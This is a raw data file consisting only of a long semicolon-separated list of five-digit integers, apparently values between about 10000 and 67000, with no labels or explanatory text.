52023;39645;52285;51332;52912;45963;50193;51433;21620;60333;19271;66033;20039;34364;29699;33746;12689;58267;66549;43372;39762;13422;23772;27355;45853;35514;52319;49230;66028;49619;34156;33316;48201;54272;51486;31406;59489;59133;48810;50403;25372;49805;48656;32544;26747;30835;62281;51966;56183;31440;64400;22789;61395;49647;66008;11840;19347;22290;35977;55740;66648;59410;32746;11507;19358;39564;25281;20927;49743;14616;54048;54563;17730;59615;48776;21130;35777;12554;60907;26776;28767;21782;10584;33755;66802;53506;25570;32548;13334;40967;38347;50007;28774;34241;35279;26051;22889;29139;50748;50930;40300;34906;31098;58479;23757;48711;47760;56576;36289;31745;17345;37158;47321;48802;50589;13252;61039;13703;48475;30433;55313;63086;59228;55872;66786;25010;44382;27656;16874;48422;55344;50105;42191;61094;66283;46284;48579;57091;19773;58769;53116;31603;36948;48694;40336;53309;52590;54146;17803;36091;24315;17809;59473;64673;26082;44905;19669;63933;61152;53672;25139;17600;41256;29829;53610;60556;36824;51587;61079;27283;55903;34639;63226;48769;27941;35665;44116;42249;34262;58617;36613;43547;13649;49697;53487;14538;35597;16103;12731;58130;47156;29217;63782;45940;54709;46496;32254;36674;62930;30761;46543;28680;42290;41305;18880;39681;56597;14266;46470;55179;36217;55588;29505;29864;15601;27933;62106;56453;24658;61848;59610;15101;62000;12330;56804;65777;23082;20824;28284;39818;44542;33167;40768;38559;19221;49674;40409;54252;35553;25197;36547;61226;32674;49211;45992;11155;40825;63640;48817;33540;23254;11539;63605;53017;23259;18281;42281;26055;15904;32645;11480;60868;49572;57563;29813;40023;14628;42038;30506;20736;14601;35654;28711;51551;27076;47653;44250;52137;41916;20541;43566;15958;54088;29144;61054;41961;65288;26433;31001;27104;41691;11366;59291;64661;12549;39335;10362;27107;12594;40052;27566;28645;46601;28889;49174;57536;29251;61707;65153;51495;53580;20624;34648;40901;53560;39856;65714;13193;46536;59297;25047;42743;37454;48347;33996;19659;44659;35217;47842;44740;45952;42416;52830;62165;48414;60234;45624;63378;38885;43132;63281;61256;53642;30611;28097;62631;57499;64334;64131;49134;35060;44517;44812;63809;56088;65149;62026;59125;19070;50002;21539;58341;23151;48448;13226;58476;41912;58717;53232;61431;25854;58153;43214;64190;17314;35635;27943;13364;10882;26918;26549;33756;12082;53317;50713;21954;51944;32175;59995;63987;63539;27272;42007;27313;15228;18948;39967;57556;25910;49703;11899;36832;13518;62042;54218;50968;14741;20297;38837;63747;47032;51380;56467;52140;59120;64586;44265;29822;48836;31928;39168;22814;46963;38738;25723;36460;43842;27758;18635;15079;62182;62737;25871;20522;17734;48976;57223;23853;15069;55005;63672;22715;15328;44967;61843;26004;22349;64129;53952;51749;21873;22115;25087;28586;58454;58816;50326;25562;63107;30982;61200;15015;48285;44296;61970;58024;30670;13149;36061;10195;53289;10423;10596;29686;20205;18470;64099;12848;66473;57755;61346;51694;61440;65693;52820;47389;19025;18947;23613;24513;32995;27214;56124;59143;14967;50110;18023;61348;48993;34452;56499;31891;30348;49077;21118;33162;55369;53180;34775;50726;54942;26044;20463;59626;52127;41589;14316;28313;66736;30759;27012;60130;61076;25136;15310;58377;40269;33537;60453;39847;60041;63240;28540;38021;55390;42066;11002;24164;63911;17243;35153;61290;63983;40492;21723;28863;64855;60946;39431;29775;63675;13448;58214;60741;35859;65216;26065;42463;11844;44704;23105;26214;30407;57678;63961;58643;13911;54343;38215;63575;34215;21317;10215;42588;65935;40950;16287;28105;38348;57590;27073;35372;50528;24372;43513;42925;33550;49472;54820;52792;22704;18248;63006;29896;24966;17770;53436;10022;59591;58577;57246;46406;63118;10826;41332;26575;27760;61202;35767;14958;37965;20645;18233;57773;26374;62397;60953;59947;64471;14124;16050;54402;33197;59232;62848;42858;38224;66055;29099;27500;35354;53769;63438;56049;17437;36302;45407;60821;31065;50549;47342;51411;34857;25190;28874;52091;61067;50780;33205;20765;42919;41522;38600;49302;37679;43752;40771;66344;64711;20985;14657;37027;52064;12936;36706;14942;22165;41731;14674;22947;29428;55880;57391;62554;53198;23451;41321;42714;41771;51413;24187;30164;22701;33518;43402;17401;36764;58763;51847;64069;55808;13967;57776;33341;15477;10961;16951;50115;31797;32567;50291;16119;13770;13316;28236;43340;66691;39076;40361;54451;22269;63737;13788;38413;36910;12041;20437;20882;14813;35889;52274;61100;18337;42694;60527;23420;41494;57839;27579;36808;38583;19151;21094;15617;16215;50084;60653;30448;34009;54628;11044;34728;28510;36280;50422;58492;32342;62767;16487;36445;17155;57026;66163;18970;42162;16743;46850;61163;46306;33853;21428;58805;33435;38159;31265;60708;41591;56296;35932;66153;36731;53640;58694;42937;18728;43951;29853;15691;20858;19604;31954;52193;21270;32160;15223;52227;26983;18504;42724;43072;65208;52726;49995;59383;49396;48549;11230;59052;63695;17975;39509;42019;12339;63466;18788;64577;30984;19591;44411;66228;17516;36188;50178;28315;29412;36379;41661;32823;30673;21874;15255;40961;28522;19272;52100;36051;45532;15010;24314;19956;50634;11441;21106;15082;60344;49196;36312;10188;37211;18198;56878;29149;36000;62948;56254;28102;49339;18617;63776;42303;34526;46171;25096;30760;20449;48840;57797;58655;58163;58658;20656;66485;38282;14794;20082;21251;32841;15559;13869;48887;39161;15169;11484;29903;55833;29126;46636;18685;59349;40817;15509;28693;55688;42286;20390;64880;29290;17506;40208;30661;31462;27560;64794;38938;47005;62392;38197;53441;52811;52842;22542;21486;10107;64527;32032;35121;61602;46009;42901;55272;25631;62076;45600;25287;64032;35038;19734;57459;11936;26594;54579;26734;61922;37134;48608;24645;20370;35371;41988;65051;41802;26520;43864;49562;62053;18189;63382;27179;55429;63641;28865;24945;27469;64784;25527;22105;34569;64637;13742;24595;54614;43215;56391;57001;65739;27849;31481;36759;21661;61186;44453;35077;12342;55990;53990;51151;17204;58089;23393;11087;27331;39382;49586;23921;17647;16786;54375;24494;55652;32564;53974;46665;15192;59708;50929;47151;17387;16686;25000;24943;59754;17245;54800;13661;30378;52647;21102;35004;59159;29827;64478;60561;66875;54657;21033;11822;46024;23328;22610;50204;25257;15768;46107;22639;21700;20566;62868;42062;58685;30891;15134;52458;24058;49108;43764;55661;30833;17976;57540;38459;59508;36202;24156;26786;57639;51622;54669;56562;58792;37391;52703;41251;33621;35155;39333;35600;37141;23483;22498;28545;39715;47379;54897;34306;16172;60232;33013;10640;10163;58852;58826;33281;24432;26301;46487;39682;34542;41899;54908;12293;12958;48778;10055;50044;32209;15596;24389;50718;30229;37236;29064;29023;26389;24466;20362;54731;62184;44827;51652;47788;24675;11450;33208;31644;14822;14839;65873;65648;35397;66543;14745;46620;46365;44287;63496;58382;43125;49029;14003;42896;34415;47574;48758;30559;43779;64068;59688;20346;32143;13811;16167;55323;19783;38731;59637;20054;46500;58318;48317;28361;52714;11124;59898;66445;38000;13105;55547;24777;29610;53213;53214;17796;28373;14668;11716;28232;51628;27297;62582;42200;41903;22568;31725;56987;34401;12469;43095;27311;43917;15799;63515;62012;37683;63278;22688;66715;48872;21356;65859;21129;64872;18760;56858;55925;12308;48583;47285;44575;27092;60662;13239;65560;40671;57609;28296;15851;47411;55953;64102;27737;19362;28200;66131;60986;39473;20102;28778;25616;39219;10679;40022;57780;64434;42104;46501;30603;15510;29565;45681;49333;41277;23136;39993;65469;38816;65937;13066;32763;56828;24189;47139;54856;36158;44855;35015;28910;63215;17632;30080;63021;40816;34662;33465;26425;59076;21101;12080;41340;42638;29658;29181;35564;28203;14804;28440;13577;65784;28536;26202;11708;55193;29458;65661;31182;43482;24318;32676;57011;33254;46010;42664;52451;38293;49283;56347;12032;15374;21456;30589;24662;18182;24376;41797;66523;51136;38836;50483;11278;47048;27664;34897;14426;10246;37631;38997;17368;17703;15392;63464;16871;24590;26143;15879;42369;63336;65795;62384;16289;65040;23030;12545;50655;45244;66617;48378;48288;18397;28041;50201;57676;50385;60501;36666;18574;25597;13641;59838;42862;55765;18800;12373;22454;24440;60997;27983;18627;55865;25935;56967;51116;12020;26474;66404;57806;43936;10287;13111;41336;20117;38195;43997;33471;51810;61016;62933;21867;19035;29132;19471;65646;37754;64274;23332;60298;29398;47405;54190;24112;60970;41564;26966;38415;48556;19518;54815;58650;43243;63445;12815;11846;47904;65518;22148;64548;49486;40032;46183;47024;12430;32469;48654;27825;28904;27924;60358;51483;31752;57852;66633;23371;54670;64892;16311;22706;18030;24128;14305;43514;63967;10027;48658;32749;23690;47353;13307;53424;26564;47661;39523;35625;55396;36153;65608;61448;51666;19765;46749;47448;56497;35254;35497;24148;22443;40071;21151;65826;32871;53110;41360;55709;27376;44091;24493;31814;25499;39164;63712;29028;36498;64266;48580;28453;18439;56571;25966;55413;23053;27954;32335;42915;52176;44186;63803;25209;19407;49199;15191;57889;60904;10717;13946;15762;25194;61419;17468;65057;11210;45751;37571;58604;40557;50789;22446;19834;47444;46340;18706;34082;15083;61241;28199;11862;50080;26507;40922;45125;12868;47020;61217;59650;40294;57510;42792;50312;31807;53062;58706;48911;34521;15946;61850;22698;59793;21348;48535;31744;13135;27347;10960;22776;35215;21383;28806;51228;32968;36917;33274;48992;47204;18883;23838;49510;51910;61520;50479;18952;51329;31137;19463;57683;19248;63973;45791;23471;49180;54192;65865;18212;32341;12053;63146;17029;63435;41032;62029;60876;41996;62590;15416;13910;14926;25055;26147;51753;63725;42308;42231;50271;40645;43812;32188;37043;26415;32927;53166;52807;59843;63441;58383;33060;39514;34540;61401;47540;38099;43365;39528;55621;39496;45943;62113;54759;23124;66728;37716;45161;53357;12860;15735;60349;49493;15323;54337;43774;56880;53944;49672;35353;55759;14532;43336;52341;40500;32630;33637;60931;62920;32693;20899;34560;54903;11527;41667;50935;38455;17349;54104;15989;51754;19520;65052;63414;21805;19079;63356;29957;49440;56673;46369;39099;47508;46542;42654;38972;34876;66441;49860;52616;16212;59016;41983;46063;28268;47623;10678;23927;13699;52097;26131;26479;66376;43617;64508;32507;25699;12833;63766;43768;64340;34692;12586;29749;59721;65759;60562;46901;58638;17649;10253;24309;32094;42545;43466;43065;51271;42503;59939;23337;14324;43420;47650;12585;32319;56334;46706;51890;35113;18985;40865;28736;47059;45531;29568;13433;19763;38377;31547;13420;64394;40468;57140;26634;22999;52675;13896;58057;63306;44339;16087;62394;52630;61540;59357;37509;31417;19177;33544;32044;61641;30516;19292;36736;59102;13797;30812;23760;25178;13155;10092;31994;23397;41997;32546;54565;34714;37494;15334;11251;24199;49850;49458;17139;27197;50014;21096;47121;10924;61720;56590;52702;35244;55449;37328;29655;12425;13138;57134;33694;50256;62516;46815;65125;33891;32315;51293;36258;32675;26892;53061;65032;10594;34301;30084;56645;53894;27631;59997;64388;28420;50686;25556;66857;14234;50848;11701;21527;23381;38771;51077;56305;15777;19890;36313;46740;49926;37724;17234;46923;34850;22630;64550;60372;58992;20966;35440;15335;35070;26222;65597;61598;24216;10701;23581;27975;24571;23127;32217;34930;58989;11604;11461;47051;56778;15238;32765;61613;28722;57169;31078;11782;19165;65241;15053;16910;23365;64287;45957;63714;26813;19556;24896;24259;55477;22439;49131;30675;34858;32974;25551;16704;11273;40733;55249;58539;65515;41800;12824;64822;40179;32797;15825;13467;17191;52882;53281;17615;31982;62537;17623;46538;22852;38121;48547;22873;11257;58828;26478;54545;13397;17419;44034;34378;35370;11011;62452;45349;54981;60300;29995;35009;45931;19076;52510;57735;34103;64604;66649;41107;18260;32719;43960;10602;36968;53076;53427;23864;35382;39559;54348;46508;27010;29951;13588;47007;20553;52146;16657;47610;49509;18208;19181;14199;59769;60286;19898;63642;49692;56454;29912;44172;66245;37340;10283;20910;16664;32408;17836;17123;22331;57562;24579;10547;50119;48553;31723;13290;34674;10365;12037;33407;26622;12353;66730;34682;21886;43919;59153;24640;13431;21254;53651;23110;44637;11098;19178;17510;58647;50174;61568;35742;20976;57822;47408;28881;33300;54765;31284;56062;40424;42602;55528;56852;57748;51141;55311;20141;42155;48492;51959;66958;34563;14132;31766;34854;60611;40710;54486;29672;56763;17227;19300;30733;60792;31698;34506;30993;37764;20538;22778;45033;31150;43205;57783;25671;18704;31846;14935;51920;61397;29026;28911;38164;34736;13224;52932;31640;48653;64724;64670;17285;51131;41936;20570;32908;30089;22469;15071;43058;31424;38405;42381;38414;43979;46681;21746;41070;26413;45728;22417;33859;23943;44798;65439;48722;13424;47833;33594;41301;57283;13137;49651;20763;19121;13461;65086;47698;60442;65572;10620;44565;64244;25921;48754;62814;53051;32887;52577;18301;47200;12127;47234;35674;58510;59024;57645;50582;23122;46872;14681;43700;39251;61808;45170;40822;15732;42893;23566;46290;48374;21631;44903;18556;27156;61643;29257;18799;54441;50412;60101;45998;65041;64708;48572;37325;62756;25769;14237;59758;52530;13602;57479;53052;41829;35434;66581;32605;32263;55418;32655;60438;59441;62604;60359;49426;55354;57209;57584;15613;14764;41876;44270;55844;49898;21057;66169;35281;60370;53139;53615;20856;45236;48320;65876;49388;45400;31388;16864;34530;33037;36374;49866;36226;15651;65320;51889;65493;40159;63673;21405;10712;20591;36555;66241;36986;44402;12485;53329;53266;60045;29592;27601;54901;36292;25938;37956;10828;26171;52527;18547;34407;62530;27931;56121;22908;24195;40433;26013;35073;32333;41544;66243;33398;35914;20108;63475;55838;49543;41227;33434;42445;66735;16685;29819;56069;60951;41149;26883;59432;64654;64240;56814;62509;41675;17733;19449;20576;60791;17776;56931;12675;11720;65875;54406;62565;20647;44484;24102;56517;28028;49037;24878;64226;37644;42551;27720;21341;49502;33373;62761;35918;42899;33914;45771;16550;64506;58861;18195;61017;32382;11156;50205;49309;45804;10068;49608;59215;50896;63657;13215;47706;28571;39838;11752;29393;13893;28016;13037;29160;38511;23272;45242;43636;12061;30853;66664;13603;51427;56416;27460;18740;39223;28496;63965;11922;56976;48777;66240;45262;12778;11591;25429;35143;18801;19080;12226;33390;25911;64335;66393;29880;51183;15467;40327;12382;27299;59211;24770;33944;13686;28195;51626;41387;21617;54707;56270;13173;11924;56171;46810;48312;19156;41801;15420;49676;62618;63469;25693;63395;60157;59475;31082;20607;39269;55343;34343;27023;26638;10563;62999;21467;11628;66767;35557;48322;23576;10133;11466;51179;61349;14477;14209;34655;25614;11640;50365;58595;65737;25763;59124;32614;66636;38612;22979;29233;11159;66209;25466;11682;18380;21711;30551;55915;10104;56189;25074;59720;58879;42631;41131;42355;32240;40994;25545;40712;14380;13931;47057;65840;42195;36256;43853;20725;17683;64076;29370;60433;19126;49920;39911;32508;36949;53432;34188;41021;30696;59959;43480;25856;11763;36716;20709;24959;18046;53127;21519;17559;51114;44711;60783;19814;25912;40116;34772;46858;58622;27824;24937;58178;65354;66909;48707;56966;39160;25016;57060;30832;16423;17663;18790;53731;51269;53922;43796;35055;36410;34720;37260;11865;17267;39403;20550;63176;25493;25041;29807;46304;43550;40040;35363;50563;60686;63688;26606;40793;48545;15209;20769;39608;52072;56806;32348;34475;34567;39879;55184;52656;41335;52497;20701;20839;45172;60834;37910;31993;46663;23025;22745;63059;56557;25555;53582;30945;24355;17978;64928;60169;10424;28340;18186;10626;31918;44440;25275;10372;55250;17429;53302;63664;33305;10076;12894;32052;30855;41446;56846;24763;27320;43010;40451;55335;10535;43448;14175;39835;26864;41438;65364;28227;42913;19277;23138;49330;25351;52169;16577;42242;65575;18838;17190;16280;32989;59497;61837;21260;38198;34641;42974;52213;58063;26293;65601;58002;50509;39487;47711;47137;49155;40639;53785;21705;52099;48808;54449;62328;22676;42478;27997;33975;59499;33356;63465;63089;44657;14782;23164;16626;34923;29121;29278;40517;11854;13023;44578;29692;34716;28672;21147;38255;42763;58979;19483;21948;18422;64075;40405;60304;49780;34583;48459;11075;47683;50521;36269;38646;20155;15792;65710;21358;33444;57071;20420;29651;31893;49060;66842;14405;57157;35901;49269;59844;66401;65150;17230;62976;15901;12204;34767;27911;18221;54646;66841;35491;25725;60274;45695;25237;53535;59760;37507;59817;38949;47324;58452;54627;18537;28790;60803;29836;39519;64775;53763;21648;14837;46034;45553;33687;48452;45858;40625;57466;42772;61025;17385;28765;50839;29723;30548;44579;43785;10124;46921;32604;28661;40699;26481;51933;22136;12717;57568;52379;25915;53960;39346;55748;63829;25898;16990;22186;33826;33909;19795;40523;59186;45334;19150;18776;42530;38424;29972;59174;65972;32838;16320;55745;64973;42960;30323;34908;62036;12766;59694;33065;21069;26019;13056;57673;49218;60246;47226;13294;64512;12850;58812;37049;15051;48241;12641;57079;60384;62666;45287;63407;37973;48533;44869;60644;58125;47551;56146;62087;50729;58993;18161;35766;53450;62426;39794;28805;58075;17035;56620;27667;37013;23523;55115;38582;44152;16949;16429;10812;60475;29309;40617;28147;24975;51041;43759;21644;63684;39205;61759;15333;58083;40954;51954;63128;22975;13538;34705;58471;25764;29277;55304;55245;33606;36777;55856;62107;23302;63256;52828;57867;38656;58770;58887;29260;15754;61963;53458;62892;49806;43631;19752;48629;32166;26719;64858;35560;64460;27679;56825;53041;49684;24138;42378;24663;18840;11191;21184;28546;41300;13802;39394;29753;48744;21086;16586;27219;20577;11072;11668;53633;12900;48213;15070;27183;38566;38087;40057;48621;52448;23101;38687;63618;54594;35871;42873;20303;18010;17546;11221;19840;44046;45466;34865;21857;40264;40083;52068;54893;56849;58091;65457;52359;30776;59596;64289;27547;42594;29098;32884;28321;24063;32781;56747;63400;57991;17783;41630;35048;20963;63049;28126;54974;25301;27900;45186;61788;63817;40738;20837;46539;51719;31643;19634;62025;32223;43081;39876;47865;58060;57415;52870;10134;24119;26375;31556;18074;60106;46648;22158;16917;19551;10378;19134;44585;59181;26487;40085;53620;26282;31512;62636;36570;58008;29894;17357;44785;21788;14432;20922;30055;30556;58968;15679;50512;11078;50347;33890;66167;40634;44552;35450;54631;20276;30483;55076;34199;25399;57888;16080;53711;49491;29774;18292;48962;36469;17590;59812;64537;29282;34578;52302;42574;45597;49387;28975;36431;25994;28632;18811;55526;32252;45671;65539;53806;60513;22278;39941;27155;40985;63355;38352;34184;41588;61059;19831;45194;66426;22131;52795;59426;18915;35697;24414;23117;65867;39026;44929;50101;15640;57815;58869;12609;21299;24332;12375;29068;22025;31174;49764;15982;14012;45441;34429;46510;26588;25039;20398;61624;34761;62957;24450;42347;30828;13485;10318;20782;35463;59088;54793;16261;10128;18278;64041;49139;47080;22858;11463;62031;41489;25703;38381;33951;13512;59097;13284;14375;19708;40455;64569;41402;15259;13395;26488;47756;16868;33104;50906;33808;57571;14466;13381;23922;55066;31805;53747;64203;42352;18792;14972;21398;63784;19000;45623;46230;59084;22270;62561;63028;63314;60375;39720;55498;44349;39653;42404;44010;29466;11790;20942;37100;27775;37186;14559;34380;24993;61478;19169;14704;25070;37405;38605;53592;11282;59525;24190;58152;21778;50657;62820;38622;17644;20588;34307;58435;49039;49439;13668;23662;23713;58349;52942;36183;27852;65058;59503;49267;59790;50716;15471;63956;48380;39426;42510;56417;17110;25949;32892;53393;41685;27645;25839;65862;20459;11089;21896;51785;27022;17726;59692;33893;35580;38476;27253;52472;30033;56470;40883;34817;21137;58486;55927;50286;66038;49203;26602;20022;45007;20759;46977;34323;18425;62284;34436;58609;13113;18472;10589;55817;33088;27172;44529;11853;63527;40927;13713;43436;12905;62556;62551;14276;64719;22048;55339;37774;34792;16298;28351;55514;17257;18904;22303;13935;35745;36563;61838;44960;54571;22821;17226;28040;60482;23568;30958;23641;53545;59847;43198;21224;28183;52082;17361;63105;61023;64501;19977;27907;22036;64816;11690;45132;44510;34977;46619;22249;11643;46185;64984;26445;40565;15469;50285;21528;16943;24902;14504;58504;16255;40140;30971;58724;27602;51659;27715;28557;54681;66846;18347;39562;53103;23968;60915;25465;36262;50111;19991;11311;36200;51555;34807;15462;12616;43708;43363;63046;35993;39837;58586;11188;60131;48743;15887;62320;27280;45280;14688;14345;16346;40522;39797;66364;20711;27382;38425;39744;55979;10746;37390;64715;14226;13534;59139;11271;33987;19768;38880;18927;20433;62444;32356;61631;31691;16888;12537;52337;30706;64403;35453;55508;65353;27013;58423;63191;14055;10160;49186;54779;50542;35286;55188;44399;49420;19184;45224;25154;26794;37860;24218;34203;62651;41404;42486;54666;15044;10671;61625;29317;63136;15599;25245;12396;22614;42029;59767;46434;59416;55920;27536;44815;53136;46685;24443;24100;35468;25027;34747;16543;33956;30075;20780;62459;58412;45759;64143;22562;33191;55595;47252;11820;23363;25106;35608;32056;12548;38474;57733;66015;61634;28056;56275;54755;62224;22797;51006;11929;31841;29436;61840;32355;35345;11595;42255;41725;14125;46076;55627;36525;29157;12040;41531;45037;35511;17291;45574;52926;59658;24951;40972;30282;54710;61262;39436;14201;32346;64761;46232;41532;64749;50565;64169;19034;31604;22029;23061;57150;63801;24621;25829;49626;28138;25333;21791;41146;19359;60796;44752;66645;21692;12956;54747;64589;32773;45289;24986;54108;12638;39679;12772;10145;65096;54380;31767;22356;62438;61544;38751;44177;32190;65866;27215;27722;48958;47140;33847;37921;14735;37351;14655;41908;22662;61048;24248;34054;30880;23779;50810;62660;34220;31905;55067;60962;25028;53480;56827;16118;21646;47797;60926;39975;43366;53609;39190;17667;66086;36414;29696;21238;13367;18535;11709;33768;31560;12924;39892;51745;51709;22506;28155;55658;65791;63045;52324;12245;24004;31574;25690;45424;25561;37647;10012;31282;43624;38340;44985;46867;25753;14311;42396;14465;46933;18027;25644;22636;10430;17540;56611;17507;42258;34194;48382;37898;41299;41575;60241;51055;11829;45375;62168;38908;40163;62112;58985;66261;31580;29254;66296;24651;38332;14356;22665;39078;53122;40648;61259;45830;46425;13972;14087;53343;32446;63460;20581;16325;22486;15327;39970;39896;20798;17832;20046;63597;18835;12856;45732;50858;25770;30591;52188;46347;17118;51212;55441;33611;41721;26062;59168;54090;10894;10130;44426;16571;32832;12313;38386;22683;46698;62189;51704;55011;10886;28003;23677;56490;34398;33044;31948;10601;23527;62687;61858;47427;34970;13734;61420;33255;60853;43921;30672;46019;43655;64564;24711;34544;23236;49931;58987;57531;25318;28488;58610;15525;64517;56077;56182;10248;54509;48321;39588;51692;54801;45366;41940;17450;56231;51675;33588;29673;40006;52779;51400;35808;66370;33099;15283;21984;30914;59091;18558;26511;37365;21507;32023;63030;51515;40329;13914;62340;13580;44809;59184;29648;25668;31655;41054;56730;37150;59142;56736;11256;33644;54864;60621;47257;36603;15398;48477;50059;50644;16662;40882;15791;37082;42869;61414;19501;61470;40652;51213;52062;30702;38857;28940;62991;21134;24481;37623;11244;41072;23115;11992;43388;31642;27823;37421;46178;12419;44375;34329;18351;46130;35469;59545;15995;36367;55900;64442;39467;36461;61884;33388;16362;53077;43731;15395;49966;15367;35663;13594;18432;56128;41862;44237;61314;48486;64358;36573;14964;41636;33977;18267;44786;21785;19058;47173;57739;29471;16204;32728;39361;65167;35374;42777;65141;27527;65016;10684;12800;46956;47748;21943;15914;11813;16606;44241;22140;61836;35525;35992;20097;34106;57811;21092;47607;15425;11153;55814;28676;14051;10581;42241;20477;42711;58175;56244;21775;49752;59419;48751;15413;29378;18135;38996;62313;58269;26360;10702;11688;44219;20936;43656;54491;60111;56157;54293;15538;19405;38238;19897;47001;20247;21423;60154;36161;55521;14468;51690;21286;57509;30553;56245;39227;43293;26005;59598;43070;47046;17421;11873;32877;49691;44971;55983;59968;15094;29051;21660;63709;12112;30325;56989;47259;50559;51584;20389;66529;61437;12668;40728;53327;41441;31010;54484;44791;58613;25937;14824;61902;40278;37019;32251;55220;26475;19970;18029;46596;47113;47419;59623;28666;39371;65450;21351;34510;38652;23717;41902;46898;51060;29342;38895;50630;33052;42135;13582;63903;24268;15461;46395;50289;42193;40833;55316;44192;57905;48215;66030;55255;48936;28754;12437;62451;22189;35495;55993;52611;37953;15245;41275;59098;27761;14875;24269;42534;61545;56330;51908;66468;41359;61771;28688;62079;47162;32417;60262;24865;56053;31409;57313;51187;35565;53045;66168;54234;53311;56794;56277;38619;37384;50514;47422;50612;31369;45828;56276;54328;66416;37116;18864;36443;18391;13292;48966;46439;19175;57761;23663;49723;23947;47320;43470;54256;51644;59067;21599;16666;40153;64339;55592;63251;33911;18485;65165;65805;15489;29165;39985;31090;12612;26529;41894;28675;45798;22079;34842;65623;57045;46711;27724;55307;53721;54616;31374;35234;45978;28643;65955;62867;61485;50163;38783;54727;23552;23423;55009;31956;66180;58872;17828;61114;53117;57408;64315;60669;40787;47654;44699;14899;58229;41482;65653;26254;16627;40962;14948;38420;10677;53540;41826;27896;11280;42573;34295;23197;15834;34303;49401;49007;49682;44039;58118;56942;31125;34847;62749;19638;43704;24803;64160;21843;25417;57997;26922;45824;22948;47589;61309;51715;47134;13530;55410;23832;54507;27557;16088;13709;53314;10893;30313;47150;20329;47585;41764;60401;52956;38384;50030;57508;17539;41465;61920;34607;11748;60838;16257;29690;36586;43445;52238;20978;43035;66595;44619;29564;62894;20194;37157;62589;38963;41975;58339;11994;19223;35315;43297;16165;13793;40536;14004;50026;20988;23084;41425;42276;42926;33844;31309;35078;35007;20608;14632;19187;59774;16601;28850;15089;55347;19529;35102;63227;46748;46527;62310;42825;57738;26329;62302;22400;29019;14692;34356;58213;44770;35051;17433;23551;11923;31441;66484;46146;36136;61506;12669;26912;14361;51685;18032;46118;12412;14290;66855;13655;16049;37350;30519;46833;27932;11434;41984;60198;27000;43256;55540;34503;50472;21592;16841;33134;46182;16977;21756;30976;51392;16321;52105;19368;64837;24145;49649;26574;34599;65924;48987;66788;17262;29400;46394;38678;37725;64921;52998;44581;29845;44067;36409;17304;18489;46613;11076;11285;15371;25719;14886;14753;34805;27692;35857;46603;35729;50819;58097;41212;38088;31667;28605;52644;59738;18615;12285;19374;49978;21499;28579;65256;40095;65833;19383;34457;61284;51872;11178;20058;55668;12056;51734;66469;18774;15415;59860;51722;56715;11374;43832;48293;60316;66773;33379;43938;15992;63567;10449;53661;27503;63322;60528;49558;22108;15681;28428;65432;36602;17500;55533;32270;53073;40858;49963;60103;47306;37629;52502;33894;32565;16755;46871;57587;13507;33415;38240;46732;27740;16142;56291;38905;18859;53364;50633;28189;53010;23896;56770;30000;65832;14113;42181;10034;37218;53532;44368;12606;37862;37866;32540;50888;59712;58657;44345;18126;28270;65949;26130;41204;51090;19576;37876;15173;39960;22360;41626;54149;58481;39857;26369;36914;49722;42313;53867;18960;53018;45989;52810;61612;46239;39149;53467;63754;22658;49953;27519;40806;15737;57910;61915;46788;24441;27246;34827;50025;42961;45959;43364;38037;17483;22944;23636;29177;27681;46397;63511;63609;58475;20820;47692;33920;40558;29030;26509;14826;45325;24584;64757;52660;14298;19443;15532;64676;52312;36897;29077;57082;11704;22654;11600;10856;15503;24771;15813;25061;14255;66186;60831;41851;37761;66631;48912;48402;31066;28633;49627;28088;65443;18673;17217;45301;34866;56717;33538;39054;21064;23875;53222;48166;39677;39982;46621;51833;15300;49419;14859;45095;41085;32189;48162;12224;62114;47702;13141;61244;25758;47764;17538;44277;19044;24681;16059;34700;53962;42837;45575;58150;52701;15473;43270;11013;33110;40363;24088;32293;14803;35662;43308;28804;66127;18008;66499;55929;18352;37354;14633;57630;15682;49551;49064;16265;40201;59675;30957;24151;12546;57320;42933;22241;40229;45697;44861;15909;62410;49059;44173;14461;27617;22462;46918;38127;21074;16932;31621;40507;21473;11745;40324;26755;11850;31795;57385;49696;57886;59083;61080;61105;21004;18519;66107;64121;17369;21669;56651;43426;37165;27425;46743;17052;15345;31877;49295;11868;17551;55732;61955;19258;34803;61225;31187;66511;25824;52646;13157;49178;16361;16764;31421;46675;21010;17078;26311;39625;40948;17055;18219;46746;17624;48994;66604;62992;66229;58405;31864;13720;24210;24380;34642;15861;64631;51701;40666;27228;39702;40563;56200;25217;47022;30102;43275;19237;63151;37425;20157;43112;48200;64284;42687;24887;46744;15436;28788;52185;31709;61274;21585;17082;63487;49791;28146;17660;66026;56729;48877;35112;10314;10418;41517;57643;61028;19944;47116;39750;31099;52385;65176;62765;56663;22483;36141;27890;12685;35392;30044;41136;63337;66725;30581;60078;19215;59584;65675;33690;14317;25270;27629;20069;24382;41302;40015;20892;49550;64454;53278;25447;37618;29590;57974;11545;38248;35963;25084;11735;18501;52399;14088;41386;15037;45936;44121;23413;62466;57680;59613;20353;39063;31092;49887;62955;27634;40415;46962;35924;37826;25435;32004;25606;24205;39756;63261;18817;55686;41406;50133;37770;50071;29748;34015;13698;13864;46587;25031;31896;51883;45995;63759;15773;61477;59085;44389;58406;15996;61815;29299;37529;56510;19651;64049;17735;37323;14984;62698;19596;11298;62735;46580;44032;29441;61570;50262;32457;48624;13029;27537;39851;40401;22800;31855;38391;13784;53407;13691;43391;56918;20093;49351;23711;14384;49527;10735;35646;26979;37356;64513;62989;45219;37409;17801;45645;31448;12873;59149;19587;17708;54588;14761;56205;43845;54791;62812;57816;46405;17430;46466;16639;33495;29498;24395;13438;47205;25737;33907;23447;41767;15431;59684;35287;61405;38985;14832;32843;49171;14977;13276;14350;61407;18056;59488;18153;53014;16238;65337;41104;33648;60277;50065;30988;21907;33086;60191;44038;46990;29115;23892;10164;28210;11736;33811;46964;64182;32686;29607;59050;28143;55926;32664;33845;59221;47509;35726;66722;13895;20612;10452;40467;37161;26539;54028;18884;60950;48267;56886;18990;66442;21245;27384;45526;32969;27627;38618;38538;58401;26531;51736;42505;36119;42656;38016;13136;17476;17482;37215;56573;14719;29463;15468;55941;15763;47047;54758;57633;17199;30188;40072;48443;37751;11475;21967;21675;26064;32173;23497;58915;65342;29038;42855;25721;34382;32753;35300;60755;53901;37674;45202;33011;33857;30992;22767;42562;56676;31272;27858;30124;42839;17310;26737;16425;25370;53693;13612;31495;35230;40195;50316;45017;42174;29314;58663;40693;24397;33895;15218;41361;21710;47618;32277;30240;60898;56282;34230;35421;12787;23993;20419;24581;59543;11540;32711;49830;49327;10158;42382;57809;61229;17400;26355;38354;18544;40903;43660;23454;59189;39665;19815;16456;31459;50567;56338;56310;23141;50525;53849;13014;27440;27790;42273;19913;11635;45950;45955;16587;35666;51442;65212;44544;39916;56936;